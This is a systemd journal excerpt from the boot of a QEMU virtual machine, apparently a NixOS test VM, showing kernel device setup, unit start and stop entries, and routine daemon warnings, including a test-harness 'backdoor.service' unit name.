machine # Aug 02 11:49:33 machine systemd[1]: Finished File System Check on /dev/disk/by-label/ESP.
machine # ░░ Subject: A start job for unit systemd-fsck@dev-disk-by\x2dlabel-ESP.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-fsck@dev-disk-by\x2dlabel-ESP.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 38.
machine # Aug 02 11:49:33 machine kernel: ACPI: button: Power Button [PWRF]
machine # Aug 02 11:49:33 machine kernel: piix4_smbus 0000:00:01.3: SMBus Host Controller at 0xb100, revision 0
machine # Aug 02 11:49:33 machine kernel: input: QEMU Virtio Keyboard as /devices/pci0000:00/0000:00:0c.0/virtio9/input/input4
machine # Aug 02 11:49:33 machine kernel: parport_pc 00:03: reported by Plug and Play ACPI
machine # Aug 02 11:49:33 machine kernel: parport0: PC-style at 0x378, irq 7 [PCSPP(,...)]
machine # Aug 02 11:49:33 machine kernel: Floppy drive(s): fd0 is 2.88M AMI BIOS
machine # Aug 02 11:49:33 machine kernel: mousedev: PS/2 mouse device common for all mice
machine # Aug 02 11:49:33 machine kernel: Console: switching to colour dummy device 80x25
machine # Aug 02 11:49:33 machine kernel: bochs-drm 0000:00:02.0: vgaarb: deactivate vga console
machine # Aug 02 11:49:33 machine kernel: FDC 0 is a S82078B
machine # Aug 02 11:49:33 machine kernel: [drm] Found bochs VGA, ID 0xb0c5.
machine # Aug 02 11:49:33 machine kernel: [drm] Framebuffer size 16384 kB @ 0xc0000000, mmio @ 0xc104c000.
machine # Aug 02 11:49:33 machine kernel: [drm] Found EDID data blob.
machine # Aug 02 11:49:33 machine kernel: [drm] Initialized bochs-drm 1.0.0 20130925 for 0000:00:02.0 on minor 0
machine # Aug 02 11:49:33 machine kernel: fbcon: bochs-drmdrmfb (fb0) is primary device
machine # Aug 02 11:49:33 machine kernel: Console: switching to colour frame buffer device 160x50
machine # Aug 02 11:49:33 machine kernel: input: VirtualPS/2 VMware VMMouse as /devices/platform/i8042/serio1/input/input6
machine # Aug 02 11:49:33 machine kernel: input: VirtualPS/2 VMware VMMouse as /devices/platform/i8042/serio1/input/input5
machine # Aug 02 11:49:33 machine kernel: ppdev: user-space parallel port driver
machine # Aug 02 11:49:33 machine kernel: bochs-drm 0000:00:02.0: [drm] fb0: bochs-drmdrmfb frame buffer device
machine # Aug 02 11:49:33 machine systemd[1]: Finished Firewall.
machine # ░░ Subject: A start job for unit firewall.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit firewall.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 58.
machine # Aug 02 11:49:33 machine systemd[1]: Starting Virtual Console Setup...
machine # ░░ Subject: A start job for unit systemd-vconsole-setup.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-vconsole-setup.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 118.
machine # Aug 02 11:49:33 machine systemd[1]: systemd-vconsole-setup.service: Deactivated successfully.
machine # ░░ Subject: Unit succeeded
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ The unit systemd-vconsole-setup.service has successfully entered the 'dead' state.
machine # Aug 02 11:49:33 machine systemd[1]: Stopped Virtual Console Setup.
machine # ░░ Subject: A stop job for unit systemd-vconsole-setup.service has finished
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit systemd-vconsole-setup.service has finished.
machine # ░░
machine # ░░ The job identifier is 118 and the job result is done.
machine # Aug 02 11:49:33 machine systemd[1]: Starting Virtual Console Setup...
machine # ░░ Subject: A start job for unit systemd-vconsole-setup.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-vconsole-setup.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 118.
machine # Aug 02 11:49:33 machine kernel: RAPL PMU: API unit is 2^-32 Joules, 0 fixed counters, 10737418240 ms ovfl timer
machine # Aug 02 11:49:33 machine systemd[1]: systemd-vconsole-setup.service: Deactivated successfully.
machine # ░░ Subject: Unit succeeded
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ The unit systemd-vconsole-setup.service has successfully entered the 'dead' state.
machine # Aug 02 11:49:33 machine systemd[1]: Stopped Virtual Console Setup.
machine # ░░ Subject: A stop job for unit systemd-vconsole-setup.service has finished
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit systemd-vconsole-setup.service has finished.
machine # ░░
machine # ░░ The job identifier is 118 and the job result is done.
machine # Aug 02 11:49:33 machine systemd[1]: Starting Virtual Console Setup...
machine # ░░ Subject: A start job for unit systemd-vconsole-setup.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-vconsole-setup.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 118.
machine # Aug 02 11:49:33 machine kernel: intel_rapl_msr: PL4 support detected.
machine # Aug 02 11:49:33 machine systemd[1]: Mounting /boot...
machine # ░░ Subject: A start job for unit boot.mount has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit boot.mount has begun execution.
machine # ░░
machine # ░░ The job identifier is 37.
machine # Aug 02 11:49:33 machine systemd[1]: Mounting /run/wrappers...
machine # ░░ Subject: A start job for unit run-wrappers.mount has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit run-wrappers.mount has begun execution.
machine # ░░
machine # ░░ The job identifier is 31.
machine # Aug 02 11:49:33 machine systemd[1]: Mounted /run/wrappers.
machine # ░░ Subject: A start job for unit run-wrappers.mount has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit run-wrappers.mount has finished successfully.
machine # ░░
machine # ░░ The job identifier is 31.
machine # Aug 02 11:49:33 machine systemd[1]: Starting Create SUID/SGID Wrappers...
machine # ░░ Subject: A start job for unit suid-sgid-wrappers.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit suid-sgid-wrappers.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 27.
machine # Aug 02 11:49:33 machine systemd[1]: Mounted /boot.
machine # ░░ Subject: A start job for unit boot.mount has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit boot.mount has finished successfully.
machine # ░░
machine # ░░ The job identifier is 37.
machine # Aug 02 11:49:33 machine systemd[1]: Reached target Local File Systems.
machine # ░░ Subject: A start job for unit local-fs.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit local-fs.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 35.
machine # Aug 02 11:49:33 machine systemd[1]: Listening on Boot Entries Service Socket.
machine # ░░ Subject: A start job for unit systemd-bootctl.socket has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-bootctl.socket has finished successfully.
machine # ░░
machine # ░░ The job identifier is 73.
machine # Aug 02 11:49:33 machine systemd[1]: Starting Update Boot Loader Random Seed...
machine # ░░ Subject: A start job for unit systemd-boot-random-seed.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-boot-random-seed.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 62.
machine # Aug 02 11:49:33 machine systemd[1]: Starting Create System Files and Directories...
machine # ░░ Subject: A start job for unit systemd-tmpfiles-setup.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-tmpfiles-setup.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 9.
machine # Aug 02 11:49:33 machine bootctl[661]: ! Mount point '/boot' which backs the random seed file is world accessible, which is a security hole! !
machine # Aug 02 11:49:33 machine bootctl[661]: ! Random seed file '/boot/loader/random-seed' is world accessible, which is a security hole! !
machine # Aug 02 11:49:33 machine bootctl[661]: Random seed file /boot/loader/random-seed successfully refreshed (32 bytes).
machine # Aug 02 11:49:33 machine systemd[1]: Finished Update Boot Loader Random Seed.
machine # ░░ Subject: A start job for unit systemd-boot-random-seed.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-boot-random-seed.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 62.
machine # Aug 02 11:49:33 machine systemd[1]: Finished Create System Files and Directories.
machine # ░░ Subject: A start job for unit systemd-tmpfiles-setup.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-tmpfiles-setup.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 9.
machine # Aug 02 11:49:33 machine systemd[1]: Starting Rebuild Journal Catalog...
machine # ░░ Subject: A start job for unit systemd-journal-catalog-update.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-journal-catalog-update.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 17.
machine # Aug 02 11:49:33 machine systemd[1]: Starting Userspace Out-Of-Memory (OOM) Killer...
machine # ░░ Subject: A start job for unit systemd-oomd.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-oomd.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 108.
machine # Aug 02 11:49:33 machine systemd[1]: Starting Record System Boot/Shutdown in UTMP...
machine # ░░ Subject: A start job for unit systemd-update-utmp.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-update-utmp.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 45.
machine # Aug 02 11:49:33 machine systemd[1]: Finished Virtual Console Setup.
machine # ░░ Subject: A start job for unit systemd-vconsole-setup.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-vconsole-setup.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 118.
machine # Aug 02 11:49:33 machine systemd[1]: Finished Record System Boot/Shutdown in UTMP.
machine # ░░ Subject: A start job for unit systemd-update-utmp.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-update-utmp.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 45.
machine # Aug 02 11:49:33 machine systemd[1]: Finished Rebuild Journal Catalog.
machine # ░░ Subject: A start job for unit systemd-journal-catalog-update.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-journal-catalog-update.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 17.
machine # Aug 02 11:49:33 machine systemd[1]: Starting Update is Completed...
machine # ░░ Subject: A start job for unit systemd-update-done.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-update-done.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 50.
machine # Aug 02 11:49:33 machine systemd-oomd[681]: No swap; memory pressure usage will be degraded
machine # Aug 02 11:49:33 machine systemd[1]: Started Userspace Out-Of-Memory (OOM) Killer.
machine # ░░ Subject: A start job for unit systemd-oomd.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-oomd.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 108.
machine # Aug 02 11:49:33 machine systemd[1]: Finished Update is Completed.
machine # ░░ Subject: A start job for unit systemd-update-done.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-update-done.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 50.
machine # Aug 02 11:49:34 machine systemd[1]: suid-sgid-wrappers.service: Deactivated successfully.
machine # ░░ Subject: Unit succeeded
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ The unit suid-sgid-wrappers.service has successfully entered the 'dead' state.
machine # Aug 02 11:49:34 machine systemd[1]: Finished Create SUID/SGID Wrappers.
machine # ░░ Subject: A start job for unit suid-sgid-wrappers.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit suid-sgid-wrappers.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 27.
machine # Aug 02 11:49:34 machine systemd[1]: Reached target System Initialization.
machine # ░░ Subject: A start job for unit sysinit.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit sysinit.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 6.
machine # Aug 02 11:49:34 machine systemd[1]: Started Daily Cleanup of Temporary Directories.
machine # ░░ Subject: A start job for unit systemd-tmpfiles-clean.timer has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-tmpfiles-clean.timer has finished successfully.
machine # ░░
machine # ░░ The job identifier is 66.
machine # Aug 02 11:49:34 machine systemd[1]: Reached target Timer Units.
machine # ░░ Subject: A start job for unit timers.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit timers.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 65.
machine # Aug 02 11:49:34 machine systemd[1]: Listening on Avahi mDNS/DNS-SD Stack Activation Socket.
machine # ░░ Subject: A start job for unit avahi-daemon.socket has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit avahi-daemon.socket has finished successfully.
machine # ░░
machine # ░░ The job identifier is 75.
machine # Aug 02 11:49:34 machine systemd[1]: Listening on D-Bus System Message Bus Socket.
machine # ░░ Subject: A start job for unit dbus.socket has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit dbus.socket has finished successfully.
machine # ░░
machine # ░░ The job identifier is 81.
machine # Aug 02 11:49:34 machine systemd[1]: Listening on Nix Daemon Socket.
machine # ░░ Subject: A start job for unit nix-daemon.socket has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit nix-daemon.socket has finished successfully.
machine # ░░
machine # ░░ The job identifier is 71.
machine # Aug 02 11:49:34 machine systemd[1]: Listening on Hostname Service Socket.
machine # ░░ Subject: A start job for unit systemd-hostnamed.socket has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-hostnamed.socket has finished successfully.
machine # ░░
machine # ░░ The job identifier is 70.
machine # Aug 02 11:49:34 machine systemd[1]: Reached target Socket Units.
machine # ░░ Subject: A start job for unit sockets.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit sockets.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 68.
machine # Aug 02 11:49:34 machine systemd[1]: Reached target Basic System.
machine # ░░ Subject: A start job for unit basic.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit basic.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 3.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Network Manager Script Dispatcher Service...
machine # ░░ Subject: A start job for unit NetworkManager-dispatcher.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit NetworkManager-dispatcher.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 88.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Kernel Auditing...
machine # ░░ Subject: A start job for unit audit.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit audit.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 77.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Avahi mDNS/DNS-SD Stack...
machine # ░░ Subject: A start job for unit avahi-daemon.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit avahi-daemon.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 102.
machine # Aug 02 11:49:34 machine systemd[1]: Started backdoor.service.
machine # ░░ Subject: A start job for unit backdoor.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit backdoor.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 92.
machine # Aug 02 11:49:34 machine systemd[1]: Starting D-Bus System Message Bus...
machine # ░░ Subject: A start job for unit dbus.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit dbus.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 82.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Name Service Cache Daemon (nsncd)...
machine # ░░ Subject: A start job for unit nscd.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit nscd.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 99.
machine # Aug 02 11:49:34 machine systemd[1]: Started Reset console on configuration changes.
machine # ░░ Subject: A start job for unit reload-systemd-vconsole-setup.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit reload-systemd-vconsole-setup.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 110.
machine # Aug 02 11:49:34 machine systemd[1]: Starting resolvconf update...
machine # ░░ Subject: A start job for unit resolvconf.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit resolvconf.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 95.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Virtual Machine and Container Registration Service...
machine # ░░ Subject: A start job for unit systemd-machined.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-machined.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 114.
machine # Aug 02 11:49:34 machine bwqjwbrk4j8iwchyg2g7041fq3v50j2n-audit-disable[752]: No rules
machine # Aug 02 11:49:34 machine systemd[1]: Finished Kernel Auditing.
machine # ░░ Subject: A start job for unit audit.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit audit.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 77.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: Found user 'avahi' (UID 999) and group 'avahi' (GID 999).
machine # Aug 02 11:49:34 machine avahi-daemon[745]: Successfully dropped root privileges.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: avahi-daemon 0.8 starting up.
machine # Aug 02 11:49:34 machine dbus-daemon[747]: dbus[747]: Unknown username "gnome-remote-desktop" in message bus configuration file
machine # Aug 02 11:49:34 machine avahi-daemon[745]: WARNING: No NSS support for mDNS detected, consider installing nss-mdns!
machine # Aug 02 11:49:34 machine systemd[1]: Started Name Service Cache Daemon (nsncd).
machine # ░░ Subject: A start job for unit nscd.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit nscd.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 99.
machine # Aug 02 11:49:34 machine nsncd[748]: Aug 02 11:49:34.136 INFO started, config: Config { ignored_request_types: {}, worker_count: 8, handoff_timeout: 3s }, path: "/var/run/nscd/socket"
machine # Aug 02 11:49:34 machine systemd[1]: Reached target Host and Network Name Lookups.
machine # ░░ Subject: A start job for unit nss-lookup.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit nss-lookup.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 100.
machine # Aug 02 11:49:34 machine dbus-daemon[747]: dbus[747]: Unknown username "nm-openconnect" in message bus configuration file
machine # Aug 02 11:49:34 machine systemd[1]: Reached target User and Group Name Lookups.
machine # ░░ Subject: A start job for unit nss-user-lookup.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit nss-user-lookup.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 101.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Accounts Service...
machine # ░░ Subject: A start job for unit accounts-daemon.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit accounts-daemon.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 112.
machine # Aug 02 11:49:34 machine systemd[1]: Starting User Login Management...
machine # ░░ Subject: A start job for unit systemd-logind.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-logind.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 89.
machine # Aug 02 11:49:34 machine dbus-daemon[747]: dbus[747]: Unknown group "netdev" in message bus configuration file
machine # Aug 02 11:49:34 machine dbus-daemon[747]: dbus[747]: Unknown username "pulse" in message bus configuration file
machine # Aug 02 11:49:34 machine dbus-daemon[747]: dbus[747]: Unknown username "systemd-timesync" in message bus configuration file
machine # Aug 02 11:49:34 machine dbus-daemon[747]: dbus[747]: Unknown username "nm-openconnect" in message bus configuration file
machine # Aug 02 11:49:34 machine dbus-daemon[747]: dbus[747]: Unknown group "netdev" in message bus configuration file
machine # Aug 02 11:49:34 machine systemd[1]: Stopped target Host and Network Name Lookups.
machine # ░░ Subject: A stop job for unit nss-lookup.target has finished
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit nss-lookup.target has finished.
machine # ░░
machine # ░░ The job identifier is 222 and the job result is done.
machine # Aug 02 11:49:34 machine systemd[1]: Stopping Host and Network Name Lookups...
machine # ░░ Subject: A stop job for unit nss-lookup.target has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit nss-lookup.target has begun execution.
machine # ░░
machine # ░░ The job identifier is 222.
machine # Aug 02 11:49:34 machine systemd[1]: Stopped target User and Group Name Lookups.
machine # ░░ Subject: A stop job for unit nss-user-lookup.target has finished
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit nss-user-lookup.target has finished.
machine # ░░
machine # ░░ The job identifier is 221 and the job result is done.
machine # Aug 02 11:49:34 machine systemd[1]: Stopping User and Group Name Lookups...
machine # ░░ Subject: A stop job for unit nss-user-lookup.target has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit nss-user-lookup.target has begun execution.
machine # ░░
machine # ░░ The job identifier is 221.
machine # Aug 02 11:49:34 machine systemd[1]: Stopping Name Service Cache Daemon (nsncd)...
machine # ░░ Subject: A stop job for unit nscd.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit nscd.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 142.
machine # Aug 02 11:49:34 machine systemd[1]: nscd.service: Deactivated successfully.
machine # ░░ Subject: Unit succeeded
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ The unit nscd.service has successfully entered the 'dead' state.
machine # Aug 02 11:49:34 machine systemd[1]: Stopped Name Service Cache Daemon (nsncd).
machine # ░░ Subject: A stop job for unit nscd.service has finished
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A stop job for unit nscd.service has finished.
machine # ░░
machine # ░░ The job identifier is 142 and the job result is done.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Name Service Cache Daemon (nsncd)...
machine # ░░ Subject: A start job for unit nscd.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit nscd.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 142.
machine # Aug 02 11:49:34 machine systemd-logind[783]: New seat seat0.
machine # ░░ Subject: A new seat seat0 is now available
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░ Documentation: sd-login(3)
machine # ░░
machine # ░░ A new seat seat0 has been configured and is now available.
machine # Aug 02 11:49:34 machine systemd-logind[783]: Watching system buttons on /dev/input/event2 (Power Button)
machine # Aug 02 11:49:34 machine systemd-logind[783]: Watching system buttons on /dev/input/event3 (QEMU Virtio Keyboard)
machine # Aug 02 11:49:34 machine systemd-logind[783]: Watching system buttons on /dev/input/event0 (AT Translated Set 2 keyboard)
machine # Aug 02 11:49:34 machine systemd[1]: Finished resolvconf update.
machine # ░░ Subject: A start job for unit resolvconf.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit resolvconf.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 95.
machine # Aug 02 11:49:34 machine systemd[1]: Started User Login Management.
machine # ░░ Subject: A start job for unit systemd-logind.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-logind.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 89.
machine # Aug 02 11:49:34 machine systemd[1]: Reached target Preparation for Network.
machine # ░░ Subject: A start job for unit network-pre.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit network-pre.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 59.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Address configuration of eth1...
machine # ░░ Subject: A start job for unit network-addresses-eth1.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
